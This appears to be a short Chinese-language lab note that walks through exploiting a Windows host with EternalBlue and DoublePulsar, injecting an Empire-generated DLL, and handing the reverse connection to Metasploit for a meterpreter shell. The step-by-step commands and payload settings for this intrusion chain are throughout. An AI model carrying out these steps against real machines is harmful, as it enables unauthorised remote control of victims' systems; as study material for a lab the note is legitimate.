准备
攻击机1:win xp
安装软件:python,pywin,永恒之蓝
修改永恒之蓝中的部分代码:
fb
注释第72行
Furrbunch
修改文件、日志路径
攻击机2:kail
需安装:Empire
切换路径
cd /Empire-1.6/setup
运行安装文件,连网安装
./install.sh
设置登陆密码
攻击机1使用永恒之蓝开始攻击
切换到路径,运行 fb
python fb.py
配置受害主机IP,攻击本机IP
使用永恒之蓝
use EternalBlue
选择受害主机系统,选择FB,其他默认输入Enter
出现下面界面攻击成功
kail创建监听进程及恶意dll文件
打开Empire
./reset.sh
创建监听进程,设置Name、Host、Port,list查看监听列表
生成DLL文件,设置受害主机位数
按上述路径找见生成的dll文件复制给攻击机1
攻击机1调用DoublePulsar并注入DLL
在攻击机1终端使用DoublePulsar
use DoublePulsar
协议选择SMB,选择32位,选择RunDLL
注入失败界面
成功界面
kail系统得到反弹链接
dll注入成功时,kail显示有反弹链接
获取注入dll的受害机列表
agents
并获取链接
interact 链接名字 sysinfo
并把模块转移到msf中
usemodule code_execution/invoke_shellcode
设置转移的主机IP,端口(msf中的)
打开msf中,使用模块
use exploit/multi/handler
设置反弹链接
set PAYLOAD windows/meterpreter/reverse_https
设置主机IP、端口
模块转移成功获取shell权限
简单生物 の 学习笔记
领取专属 10元无门槛券
私享最新 技术干货